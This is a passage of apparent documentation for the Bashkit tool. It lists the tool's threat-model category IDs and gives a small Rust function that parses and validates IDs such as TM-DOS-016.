| TM-DOS | Denial of Service |
| TM-ESC | Sandbox Escape |
| TM-INF | Information Disclosure |
| TM-INJ | Injection |
| TM-NET | Network Security |
| TM-ISO | Multi-Tenant Isolation |
| TM-INT | Internal Error Handling |
| TM-LOG | Logging Security |
| TM-GIT | Git Security |
| TM-PY | Python/Monty Security |
| TM-UNI | Unicode Security |
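
For tooling that cross-references threat IDs in code comments or tests, the TM-<CATEGORY>-<NUMBER> format can be validated with a small parser. ThreatId and parse_threat_id are hypothetical and not part of Bashkit; the category list is copied from the table above.

```rust
#[derive(Debug, PartialEq, Eq)]
pub struct ThreatId {
    pub category: String,
    pub number: u32,
}

/// Parses an ID such as `TM-DOS-016`. Ranges like `TM-DOS-035-038`
/// and wildcards like `TM-DOS-*` are rejected by this sketch.
pub fn parse_threat_id(id: &str) -> Option<ThreatId> {
    const CATEGORIES: [&str; 11] = [
        "DOS", "ESC", "INF", "INJ", "NET", "ISO", "INT", "LOG", "GIT", "PY", "UNI",
    ];
    let rest = id.strip_prefix("TM-")?;
    let (category, number) = rest.split_once('-')?;
    if !CATEGORIES.contains(&category) {
        return None;
    }
    // Require plain ASCII digits so inputs like "+16" are not accepted.
    if number.is_empty() || !number.bytes().all(|b| b.is_ascii_digit()) {
        return None;
    }
    Some(ThreatId {
        category: category.to_string(),
        number: number.parse().ok()?,
    })
}
```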

Full threat analysis: specs/006-threat-model.md